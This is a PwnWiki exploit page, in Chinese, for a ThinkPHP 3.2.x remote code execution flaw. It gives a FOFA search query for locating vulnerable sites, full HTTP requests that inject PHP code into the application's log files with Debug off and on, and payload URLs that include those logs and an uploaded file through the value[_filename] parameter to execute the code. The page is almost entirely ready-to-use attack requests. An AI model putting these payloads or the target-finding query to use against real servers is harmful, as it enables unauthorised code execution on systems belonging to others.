ThinkPHP3.2.x RCE漏洞

From PwnWiki
Revision as of 14:33, 12 July 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> ==FOFA== <pre> header="thinkphp" </pre> <translate> ==漏洞利用== </translate> <translate> 關閉Debug: </translate> <pre> GET /index.php?m=--><?=phpinfo()...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎

FOFA

header="thinkphp"

漏洞利用

關閉Debug: 

GET /index.php?m=--><?=phpinfo();?> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66;
Upgrade-Insecure-Requests: 1

日誌文件 

\Application\Runtime\Logs\Common\21_06_30.log

Payload 

http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_06_30.log

PHPINFO執行成功。

開啓Debug: 

GET /index.php?m=Home&c=Index&a=index&test=--><?=phpinfo();?> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66;
Upgrade-Insecure-Requests: 1

日誌文件 

\Application\Runtime\Logs\Home\21_06_30.log

Payload 

http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_06_30.log

文件上傳

http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./test.txt

參考

https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ

Retrieved from "https://pwnwiki.com/index.php?title=ThinkPHP3.2.x_RCE漏洞&oldid=6998"